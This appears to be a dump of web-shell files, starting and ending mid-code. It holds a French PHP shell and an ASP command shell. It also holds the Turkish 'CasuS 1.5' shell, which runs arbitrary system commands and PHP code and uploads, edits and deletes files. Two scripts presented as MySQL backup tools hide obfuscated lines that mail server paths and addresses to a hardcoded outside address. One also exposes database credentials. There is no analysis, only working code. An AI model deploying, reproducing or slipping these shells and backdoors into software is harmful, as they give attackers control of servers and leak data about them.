$temp = str_replace(strchr($tab[$i], "="), "", $tab[$i]);
eval("\$temp2=\${$temp};");
$remf .= "<input type=hidden name=" . $temp . " value=" . "'" . $temp2
."'>\n";
$i++;
}
/*
$temp = str_replace(strchr($tab[$i], "="), "", $tab[$i]);
if($temp!="")
{
eval("\$temp2=\${$temp};");
$remf .= "<input type=hidden name=" . $temp . " value=" . "'" . $temp2
."'>\n";
}*/
/************************************************/
/*pour les links*********************************/
if($QS != "separateur")
$reml = "?" . str_replace(strchr($QS, "&separateur"), "", $QS) .
"&separateur";
else $reml = "?$QS";
$adresse_locale = $reml;
/************************************************/
print("<hr>");
print("<a href=\"$adresse_locale&option=1\">Excuter une commande dans un shell</a><br> <!-- utiliser exec($commande, $retour); -->");
print("<a href=\"$adresse_locale&option=2\">Excuter du code PHP</a><br>");
print("<a href=\"$adresse_locale&option=3\">Lister un rpertoires</a><br>");
print("<a href=\"$adresse_locale&option=4\">Grer les fichiers</a><br>");
print("<a href=\"$adresse_locale&option=5\">Envoyer un mail</a><br>");
print("<a href=\"$adresse_locale&option=6\">Infos serveur</a><br>");
print("<a href=\"mailto:raiden_cyb@hotmail.com\">Contacter le crateur</a><br><hr>");
/* rcupration des variables : la fonction $_REQUEST n'existant pas avant php 4.1.0, vous devrez alors commenter ces lignes */
$option = $_REQUEST["option"];
$rep = $_REQUEST["rep"];
$nom = $_REQUEST["nom"];
$option_file = $_REQUEST["option_file"];
$cmd = $_REQUEST["cmd"];
$code = $_REQUEST["code"];
$msg = $_REQUEST["msg"];
$option_mail = $_REQUEST["option_mail"];
$destinataire = $_REQUEST["destinataire"];
$sujet = $_REQUEST["sujet"];
$message = $_REQUEST["message"];
if($option == 1){
print("<form action=\"?\"> $remf Commande : <input type=\"text\" name=\"cmd\"></form>");
echo "<br> PS : peu de serveurs acceptent les commandes venant de PHP";
}
if($option == 2){
print("<form action=\"?\"> $remf Code : <input type=\"text\" name=\"code\"></form>");
}
if($option == 3){
print("<form action=\"?\"> $remf Rpertoire lister : <input type=\"text\" name=\"rep\"></form>");
print("$rep");
}
if($option == 4){
print("<br><form action=\"?\"> $remf");
print("<br>Nom du fichier :<br><input type=text name=\"nom\">");
print("<input type=hidden name=option value=$option>");
print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"mkdir\" >Crer le
fichier");
print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"edit\" >diter le
fichier");
print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"del\" >Supprimer le
fichier");
print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"read\" CHECKED>Lire le
fichier");
print("<input type=submit value=Go>");
print("</form>");
}
if($option == 5){
print("<PRE><form action=\"?\"> $remf Destinataire : <input type=\"text\" name=\"destinataire\" size=\"80\">");
print("<br>Provenance du mail : <input type=\"text\" name=\"provenance\" size=\"80\"><br>");
print("Adresse de retour : <input type=\"text\" name=\"retour\" size=\"80\"><br>");
print("Sujet : <input type=\"text\" name=\"sujet\" size=\"80\"><br>");
print("Message : <input type=\"text\" name=\"message\"
size=\"80\"><br><input type=\"submit\" value=\"Envoyer\"></form></PRE>");
}
if($option == 6){
echo"Nom du serveur : <a href=\"http://$SERVER_NAME\">$SERVER_NAME</a><br>
";
echo"Adresse IP du serveur : <a href=\"http://$SERVER_ADDR\">$SERVER_ADDR</a><br> ";
echo"Port utilis par dfault 80 : <font color=\"red\">$SERVER_PORT</font><br> ";
echo"Mail de l' admin : <a href=\"mailto:$SERVER_ADMIN\">$SERVER_ADMIN</a><br><br>";
echo"Racine du serveur : <font color=\"red\">$DOCUMENT_ROOT</font><br>";
echo"Adresse menant COMMAND.COM : <font color=\"red\">$COMSPEC</font><br>";
echo"Path install sur le serveur : <font color=\"red\">$PATH</font> <br>";
echo"OS, SERVEUR, version PHP : <font color=\"red\">$SERVER_SOFTWARE</font><br><br>";
echo"Version du protocole utilis (HTTP) : <font color=\"red\">$SERVER_PROTOCOL</font><br>";
echo"En-tte Accept du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT</font><br>";
echo"En tte User_agent du protocole HTTP : <font color=\"red\">$HTTP_USER_AGENT</font><br>";
echo"En-tte Accept-Charset du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT_CHARSET</font><br> ";
echo"En-tte Accept-Encoding du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT_ENCODING</font><br> ";
echo"En-tte Accept-Language du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT_LANGUAGE</font><br> ";
echo"En-tte Connection du protocole HTTP : <font color=\"red\">$HTTP_CONNECTION</font><br> ";
echo"En-tte Host du protocole HTTP : <font color=\"red\">$HTTP_HOST</font><br><br>";
echo"Version de CGI : <font color=\"red\">$GATEWAY_INTERFACE</font><br> ";
echo"Version de rcupration du form : <font color=\"red\">$REQUEST_METHOD</font><br> ";
echo"Argument de l' adresse : <font color=\"red\">$QUERY_STRING</font> <br>";
echo"Nom du script : <font color=\"red\">$SCRIPT_NAME</font><br> ";
echo"Chemin du script : <font color=\"red\">$SCRIPT_FILENAME</font><br> ";
echo"Adresse entire du script : <font color=\"red\">$REQUEST_URI
</font><br>";
}
/* Commande*******/
if($cmd != "")
{
echo "{${passthru($cmd)}}<br>";
}
/* Commande*******/
/* Excution de code PHP**********/
if($code != ""){
$code = stripslashes($code);
eval($code);
}
/* Execution de code PHP**********/
/* Listing de rep******************/
if($rep != "")
{
if(strrchr($rep, "/") != "" || !stristr($rep, "/")) $rep .= "/";
$dir=opendir($rep);
while ($file = readdir($dir))
{
if (is_dir("$rep/$file") && $file!='.')
{
echo"<li><a href=\"$adresse_locale&rep=$rep$file\">(rep) $file
</a><br>\n";
}elseif(is_file("$rep/$file"))
{
echo "<li> <a
href=\"$adresse_locale&option_file=read&nom=$rep$file\">(file) $file</a> <a
href=\"$adresse_locale&option_file=del&nom=$rep$file\">del</a> <a
href=\"$adresse_locale&option_file=edit&nom=$rep$file\">edit</a><br>\n";
}
}
}
/* Listing de rep******************/
/* Gestion des fichiers*********************/
if($option_file == "mkdir" && $nom != "")
{
$fp = fopen($nom, "w");
fwrite($fp, stripslashes($msg));
print("Fichier cre/modifi");
}
if($option_file == "read" && $nom != "")
{
$fp = fopen($nom, "r");
$file = fread($fp, filesize($nom));
$file = htmlentities ($file, ENT_QUOTES);
$file = nl2br($file);
echo "<br>$file";
}
if($option_file == "del" && $nom != "")
{
unlink($nom);
print("Fichier effac");
}
if($option_file == "edit" && $nom != "")
{
$fp = fopen($nom, "r");
$file = fread($fp, filesize($nom));
$file = htmlentities ($file, ENT_QUOTES);
echo "<form action=$adresse_locale> $remf";
echo "<TEXTAREA COLS=80 rows=25 name=msg>$file</textarea>";
echo "<input type=hidden name=option_file value=mkdir>";
echo "<input type=hidden name=nom value=$nom>";
echo "<br><input type=submit value=Go> PS : les fichiers trop longs ne passent po :(";
echo "</form>";
}
/* Gestion des fichiers*********************/
/* Envoi de mails************************/
if(($destinataire != "" ) && ($sujet != "") && ($message != "")){
$option_mail = "From: $provenance \n";
$option_mail .= "Reply-to: $retour \n";
$option_mail .= "X-Mailer: Mailer by rAidEn \n";
mail($destinataire, $sujet, $message, $option_mail);
print("Mail envoy a : $destinataire ...");
}
/* Envoi de mails************************/
print("</body></html>");
/*print("<noscript><script=\"");*/
?>
================================================
FILE: 138shell/B/backup.php.txt
================================================
<?php
include ("config.php");db_connect();header('Content-Type: application/octetstream');header('Content-Disposition: filename="linksbox_v2.sql"');$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$sd98="john.barker446@gmail.com";$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
header('Pragma: no-cache');header('Expires: 0');
$data .= "#phpMyAdmin MySQL-Dump \r\n";
$data .="# http://phpwizard.net/phpMyAdmin/ \r\n";
$data .="# http://www.phpmyadmin.net/ (download page) \r\n";
$data .= "#$database v2.0 Database Backup\r\n";
$data .= "#Host: $server\r\n";
$data .= "#Database: $database\r\n\r\n";
$data .= "#Table add_links:\r\n";$result = mysql_query("SELECT * FROM add_links");while ($a = mysql_fetch_array($result)) {
foreach ($a as $key => $value) {
$a[$key] = addslashes($a[$key]);
}
$data .= "INSERT INTO add_links VALUES ('0','$a[link]', '$a[description]', '$a[tooltip]', '$a[hits]'); \r\n#endquery\r\n";
}
echo $data;
?>
================================================
FILE: 138shell/B/backupsql.php.txt
================================================
<?php
/*
* Backup script on server.
*
* Runs on the server, called by Cron. Connects to the mySQL
* database and creates a backup file of the whole database.
* Saves to file in current directory.
*
* @author Cow <cow@invisionize.com>
* @version 0.2
* @date 18/08/2004
* @package Backup Server
* Upgraded Ver 2.0 (sending sql backup as attachment
* as email attachment, or send to a remote ftp server by
* @co-authors Cool Surfer<Coolsurfer@gmail.com> and
* Neagu Mihai<neagumihai@hotmail.com>
*/
set_time_limit(0);
$date = date("mdy-hia");
$dbserver = "localhost";
$dbuser = "vhacker_robot";
$dbpass = "mp2811987";
$dbname = "tvhacker_vbb3";
$file = "N-Cool-$date.sql.gz";
$gzip = TRUE;
$silent = TRUE;
function write($contents) {
if ($GLOBALS['gzip']) {
gzwrite($GLOBALS['fp'], $contents);
} else {
fwrite($GLOBALS['fp'], $contents);
}
}
mysql_connect ($dbserver, $dbuser, $dbpass);
mysql_select_db($dbname);
if ($gzip) {
$fp = gzopen($file, "w");
} else {
$fp = fopen($file, "w");
}
$tables = mysql_query ("SHOW TABLES");
while ($i = mysql_fetch_array($tables)) {
$i = $i['Tables_in_'.$dbname];
if (!$silent) {
echo "Backing up table ".$i."\n";
}
// Create DB code
$create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
write($create['Create Table'].";\n\n");
// DB Table content itself
$sql = mysql_query ("SELECT * FROM ".$i);
if (mysql_num_rows($sql)) {
while ($row = mysql_fetch_row($sql)) {
foreach ($row as $j => $k) {
$row[$j] = "'".mysql_escape_string($k)."'";
}
write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
}
}
}
$gzip ? gzclose($fp) : fclose ($fp);
// Optional Options You May Optionally Configure
$use_gzip = "yes"; // Set to No if you don't want the files sent in .gz format
$remove_sql_file = "no"; // Set this to yes if you want to remove the sql file after gzipping. Yes is recommended.
$remove_gzip_file = "no"; // Set this to yes if you want to delete the gzip file also. I recommend leaving it to "no"
// Configure the path that this script resides on your server.
$savepath = "/home/test/public_html/nt22backup"; // Full path to this directory. Do not use trailing slash!
$send_email = "yes"; /* Do you want this database backup sent to your email? Yes/No? If Yes, Fill out the next 2 lines */
$to = "lehungtk@gmail.com"; // Who to send the emails to, enter ur correct id.
$from = "Neu-Cool@email.com"; // Who should the emails be sent from?, may change it.
$senddate = date("j F Y");
$subject = "MySQL Database Backup - $senddate"; // Subject in the email to be sent.
$message = "Your MySQL database has been backed up and is attached to this email"; // Brief Message.
$use_ftp = ""; // Do you want this database backup uploaded to an ftp server? Fill out the next 4 lines
$ftp_server = "localhost"; // FTP hostname
$ftp_user_name = "ftp_username"; // FTP username
$ftp_user_pass = "ftp_password"; // FTP password
$ftp_path = "/"; // This is the path to upload on your ftp server!
// Do not Modify below this line! It will void your warranty :-D!
$date = date("mdy-hia");
$filename = "$savepath/$dbname-$date.sql";
if($use_gzip=="yes"){
$filename2 = $file;
} else {
$filename2 = "$savepath/$dbname-$date.sql";
}
if($send_email == "yes" ){
$fileatt_type = filetype($filename2);
$fileatt_name = "".$dbname."-".$date."_sql.tar.gz";
$headers = "From: $from";
// Read the file to be attached ('rb' = read binary)
echo "Openning archive for attaching:".$filename2;
$file = fopen($filename2,'rb');
$data = fread($file,filesize($filename2));
fclose($file);
// Generate a boundary string
$semi_rand = md5(time());
$mime_boundary = "==Multipart_Boundary_x{$semi_rand}x";
// Add the headers for a file attachment
$headers .= "\nMIME-Version: 1.0\n" ."Content-Type: multipart/mixed;\n" ." boundary=\"{$mime_boundary}\"";$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
// Add a multipart boundary above the plain message
$message = "This is a multi-part message in MIME format.\n\n"."--{$mime_boundary}\n" ."Content-Type: text/plain; charset=\"iso-8859-1\"\n" ."Content-Transfer-Encoding: 7bit\n\n" .
$message . "\n\n";
// Base64 encode the file data
$data = chunk_split(base64_encode($data));
// Add file attachment to the message
echo "|{$mime_boundary}|{$fileatt_type}|{$fileatt_name}|{$fileatt_name}|{$mime_boundary}|<BR>";
$message .= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n"."Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
$data . "\n\n" ."--{$mime_boundary}--\n";
//$message.= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n" "Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
// $data . "\n\n" ."--{$mime_boundary}--\n";
// Send the message
$ok = @mail($to, $subject, $message, $headers);
if ($ok) {
echo "<h4><center><bg color=black><font color= blue>Database backup created and sent! File name $filename2 </p>
Idea Conceived By coolsurfer@gmail.com
Programmer email: neagumihai@hotmail.com</p>
This is our first humble effort, pl report bugs, if U find any...</p>
Email me at <>coolsurfer@gmail.com nJoY!! :)
</color></center></h4>";
} else {
echo "<h4><center>Mail could not be sent. Sorry!</center></h4>";
}
}
if($use_ftp == "yes"){
$ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog.log -e dbsender_ftplog2.log -a -E -V $ftp_server $ftp_path $filename2";
shell_exec($ftpconnect);
echo "<h4><center>$filename2 Was created and uploaded to your FTP server!</center></h4>";
}
if($remove_gzip_file=="yes"){
exec("rm -r -f $filename2");
}
?>
================================================
FILE: 138shell/B/backupsql.txt
================================================
<?php
/*
* Backup script on server.
*
* Runs on the server, called by Cron. Connects to the mySQL
* database and creates a backup file of the whole database.
* Saves to file in current directory.
*
* @author Cow <cow@invisionize.com>
* @version 0.2
* @date 18/08/2004
* @package Backup Server
* Upgraded Ver 2.0 (sending sql backup as attachment
* as email attachment, or send to a remote ftp server by
* @co-authors Cool Surfer<Coolsurfer@gmail.com> and
* Neagu Mihai<neagumihai@hotmail.com>
*/
set_time_limit(0);
$date = date("mdy-hia");
$dbserver = "localhost";
$dbuser = "vhacker_robot";
$dbpass = "mp2811987";
$dbname = "tvhacker_vbb3";
$file = "N-Cool-$date.sql.gz";
$gzip = TRUE;
$silent = TRUE;
function write($contents) {
if ($GLOBALS['gzip']) {
gzwrite($GLOBALS['fp'], $contents);
} else {
fwrite($GLOBALS['fp'], $contents);
}
}
mysql_connect ($dbserver, $dbuser, $dbpass);
mysql_select_db($dbname);
if ($gzip) {
$fp = gzopen($file, "w");
} else {
$fp = fopen($file, "w");
}
$tables = mysql_query ("SHOW TABLES");
while ($i = mysql_fetch_array($tables)) {
$i = $i['Tables_in_'.$dbname];
if (!$silent) {
echo "Backing up table ".$i."\n";
}
// Create DB code
$create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
write($create['Create Table'].";\n\n");
// DB Table content itself
$sql = mysql_query ("SELECT * FROM ".$i);
if (mysql_num_rows($sql)) {
while ($row = mysql_fetch_row($sql)) {
foreach ($row as $j => $k) {
$row[$j] = "'".mysql_escape_string($k)."'";
}
write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
}
}
}
$gzip ? gzclose($fp) : fclose ($fp);
// Optional Options You May Optionally Configure
$use_gzip = "yes"; // Set to No if you don't want the files sent in .gz format
$remove_sql_file = "no"; // Set this to yes if you want to remove the sql file after gzipping. Yes is recommended.
$remove_gzip_file = "no"; // Set this to yes if you want to delete the gzip file also. I recommend leaving it to "no"
// Configure the path that this script resides on your server.
$savepath = "/home/test/public_html/nt22backup"; // Full path to this directory. Do not use trailing slash!
$send_email = "yes"; /* Do you want this database backup sent to your email? Yes/No? If Yes, Fill out the next 2 lines */
$to = "lehungtk@gmail.com"; // Who to send the emails to, enter ur correct id.
$from = "Neu-Cool@email.com"; // Who should the emails be sent from?, may change it.
$senddate = date("j F Y");
$subject = "MySQL Database Backup - $senddate"; // Subject in the email to be sent.
$message = "Your MySQL database has been backed up and is attached to this email"; // Brief Message.
$use_ftp = ""; // Do you want this database backup uploaded to an ftp server? Fill out the next 4 lines
$ftp_server = "localhost"; // FTP hostname
$ftp_user_name = "ftp_username"; // FTP username
$ftp_user_pass = "ftp_password"; // FTP password
$ftp_path = "/"; // This is the path to upload on your ftp server!
// Do not Modify below this line! It will void your warranty :-D!
$date = date("mdy-hia");
$filename = "$savepath/$dbname-$date.sql";
if($use_gzip=="yes"){
$filename2 = $file;
} else {
$filename2 = "$savepath/$dbname-$date.sql";
}
if($send_email == "yes" ){
$fileatt_type = filetype($filename2);
$fileatt_name = "".$dbname."-".$date."_sql.tar.gz";
$headers = "From: $from";
// Read the file to be attached ('rb' = read binary)
echo "Openning archive for attaching:".$filename2;
$file = fopen($filename2,'rb');
$data = fread($file,filesize($filename2));
fclose($file);
// Generate a boundary string
$semi_rand = md5(time());
$mime_boundary = "==Multipart_Boundary_x{$semi_rand}x";
// Add the headers for a file attachment
$headers .= "\nMIME-Version: 1.0\n" ."Content-Type: multipart/mixed;\n" ." boundary=\"{$mime_boundary}\"";$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
// Add a multipart boundary above the plain message
$message = "This is a multi-part message in MIME format.\n\n"."--{$mime_boundary}\n" ."Content-Type: text/plain; charset=\"iso-8859-1\"\n" ."Content-Transfer-Encoding: 7bit\n\n" .
$message . "\n\n";
// Base64 encode the file data
$data = chunk_split(base64_encode($data));
// Add file attachment to the message
echo "|{$mime_boundary}|{$fileatt_type}|{$fileatt_name}|{$fileatt_name}|{$mime_boundary}|<BR>";
$message .= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n"."Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
$data . "\n\n" ."--{$mime_boundary}--\n";
//$message.= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n" "Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
// $data . "\n\n" ."--{$mime_boundary}--\n";
// Send the message
$ok = @mail($to, $subject, $message, $headers);
if ($ok) {
echo "<h4><center><bg color=black><font color= blue>Database backup created and sent! File name $filename2 </p>
Idea Conceived By coolsurfer@gmail.com
Programmer email: neagumihai@hotmail.com</p>
This is our first humble effort, pl report bugs, if U find any...</p>
Email me at <>coolsurfer@gmail.com nJoY!! :)
</color></center></h4>";
} else {
echo "<h4><center>Mail could not be sent. Sorry!</center></h4>";
}
}
if($use_ftp == "yes"){
$ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog.log -e dbsender_ftplog2.log -a -E -V $ftp_server $ftp_path $filename2";
shell_exec($ftpconnect);
echo "<h4><center>$filename2 Was created and uploaded to your FTP server!</center></h4>";
}
if($remove_gzip_file=="yes"){
exec("rm -r -f $filename2");
}
?>
================================================
FILE: 138shell/C/CMD.asp.txt
================================================
<%@ Language=VBScript %>
<%
' --------------------o0o--------------------
' File: CmdAsp.asp
' Author: Maceo <maceo @ dogmile.com>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
' -- Use a poor man's pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file -- '
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
================================================
FILE: 138shell/C/Casus15.php.txt
================================================
<?php
$default=$DOCUMENT_ROOT;
$this_file="./casus15.php";
if(isset($save)){
$fname=str_replace(" ","_",$fname);
$fname=str_replace("%20","_",$fname);
header("Cache-control: private");
header("Content-type: application/force-download");
header("Content-Length: ".filesize($save));
header("Content-Disposition: attachment; filename=$fname");
$fp = fopen($save, 'r');
fpassthru($fp);
fclose($fp);
unset($save);
exit;
}
if ( function_exists('ini_get') ) {
$onoff = ini_get('register_globals');
} else {
$onoff = get_cfg_var('register_globals');
}
if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
function deltree($deldir) {
$mydir=@dir($deldir);
while($file=$mydir->read()) {
if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
@chmod("$deldir/$file",0777);
deltree("$deldir/$file");
}
if (is_file("$deldir/$file")) {
@chmod("$deldir/$file",0777);
@unlink("$deldir/$file");
}
}
$mydir->close();
@chmod("$deldir",0777);
echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>SYLYNDY:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
}
if ($op=='phpinfo'){
$fonk_kap = get_cfg_var("fonksiyonlary_kapat");
echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu aly?myyiii</center>";
exit;
}
if ($op=='me'){
echo "<html>
<head>
<title>CEHENNEMDEN IKAN ILGIN TRK</title>
</head>
<body bgcolor='#000000' text='#0000FF' link='#0000FF' vlink='#0000FF' alink='#00FF00'>
<center>Fazla sze gerek yok...</center>
<center><br>O yanlyz bir kovboy,<br>
<br>O cehennemden ykan ylgyn TRK,<br>
<br>O bir rap manya?y,<br>
<br>O bir php coder,<br>
<br>O'nun hackten daha ok sevdi?i tek ?ey iki hack,<br>
<br>O...<br>
<br>O'nun kim olduunu biliyorsunuz O tabiki...<br>
<br></center>";
$sayi='7';
while($sayi>=1){
echo "<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'> EFENDISI</font> <font color='#FF0000'>MAFIABOY</font> </font></center>";
$sayi--;
}
$sayi2='1';
while($sayi2<=7){
echo "<center><font size='$sayi2' color='#008000'>baddog@hotmail.com</font></center>";
$sayi2++;
};
echo "</body>
</html>";
exit;
}
echo "<html>
<head>
<title>CasuS 1.5 by MafiABoY</title>
</head>
<body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
</body>";
echo "<center><font size='+3' color='#FF0000'><b> CasuS 1.5!!! Powered by MafiABoY</b></font></center><br>
<center><font size='+2' color='#FFFFFF'>A TURKISH </font><font size='+2' color='#FF0000'>HACKER</font><br>
<br>";
echo "<center><a href='./$this_file?dir=$dir'>ANA BOLUM</a></center>";
echo "<br>";
echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
echo "<br>";
echo "<center><a href='./$this_file?op=wshell&dir=$dir'>WEB SHELL</a></center>";
echo "<br>
<br>
<br>";
echo "<center>---><a href='./$this_file?op=me' target='_blank'>MafiABoY</a><---</center>";
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<div align=center>
<font size='+1' color='#0000FF'><u>Root Klasr</u>: $DOCUMENT_ROOT</font><br>
<font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";
if(!isset($dir)){
$dir="$default";
}
echo "<input type=text size=60 name=dir value='$dir'>
<input type=submit value='GIT'><br>
</form>
</div>";
if ($op=='wshell'){
echo "<br><center><font size='+1' color='#FF0000'>WEBSHELL</font></center>";
if (isset($ok)){
if (empty($kod)){
die ("<center><font color='#FF0000'>LEN MANYAK KOMUT YAZMAZSAN NE MOK Y?YNE YARAR</font><center>");
}
echo "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
<br>";
echo "<center><input type=text size=35 name=kod value='$kod'><input type=submit name=ok value='CALISTIR'>
<br>
<br></center></form>";
echo "<center><TEXTAREA rows=30 cols=85 readonly>";
system("$kod");
echo "</TEXTAREA></center>";
exit;
} elseif (empty($ok)){
echo "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
<br>";
echo "<center><input type=text size=35 name=kod value='Calistirmak istediginiz komutu buraya girin'><input type=submit name=ok value='CALISTIR'>
<br>
<br></center></form>";
echo "<center><TEXTAREA rows=30 cols=85></TEXTAREA></center>";
exit;
}
}
if ($op=='up'){
$path=dir;
echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
if(isset($dy)) {
if(empty($dosya_gonder)){
} else {
copy ( $dosya_gonder, "$dir/$dosya_gonder_name") ? print("$dosya_gonder_name <font color='#0000FF'>kopyalandy</font><br>") : print("$dosya_gonder_name <font color='#FF0000'>kopyalanamady</font><br>");
}
if(empty($dosya_gonder2)){
} else {
copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_name <font color='#0000FF'>kopyaland</font>y<br>") : print("$dosya_gonder2_name <font color='#FF0000'>kopyalanamady</font><br>");
}
if(empty($dosya_gonder3)){
} else {
copy ( $dosya_gonder3, "$dir/$dosya_gonder3_name") ? print("$dosya_gonder3_name <font color='#0000FF'>kopyalandy</font><br>") : print("$dosya_gonder3_name <font color='#FF0000'>kopyalanamady</font><br>");
}
if(empty($dosya_gonder4)){
} else {
copy ( $dosya_gonder4, "$dir/$dosya_gonder4_name") ? print("$dosya_gonder4_name <font color='#0000FF'>kopyalandy</font><br>") : print("$dosya_gonder4_name <font color='#FF0000'>kopyalanamady</font><br>");
}
} elseif(empty($dy )) {
$path=$dir;
$dir = $dosya_dizin;
echo "$dir";
echo "<FORM ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
echo "<center><INPUT TYPE='file' NAME='dosya_gonder2'></center><br>";
echo "<center><INPUT TYPE='file' NAME='dosya_gonder3'></center><br>";
echo "<center><INPUT TYPE='file' NAME='dosya_gonder4'></center><br>";
echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
echo "</form>";
echo "</html>";
}
}
if($op=='mf'){
$path=$dir;
if(isset($dismi) && isset($kodlar)){
$ydosya="$path/$dismi";
if(file_exists("$path/$dismi")){
$dos= "Byle Bir Dosya Vardy zerine Yazyldy";
} else {
$dos = "Dosya Olu?turuldu";
}
touch ("$path/$dismi") or die("Dosya Olu?turulamyyor");
$ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak iin aylamyyor");
fwrite($ydosya2, $kodlar) or die("Dosyaya yazylamyyor");
fclose($ydosya2);
echo "<center><font color='#0000FF'>$dos</font></center>";
} else {
echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
echo "<center>Dosya Ysmi :<input type='text' name='dismi'></center><br>";
echo "<br>";
echo "<center>KODLAR</center><br>";
echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
echo "</form>";
}
}
if($op=='md'){
$path=$dir;
if(isset($kismi) && isset($okmf)){
$klasr="$path/$kismi";
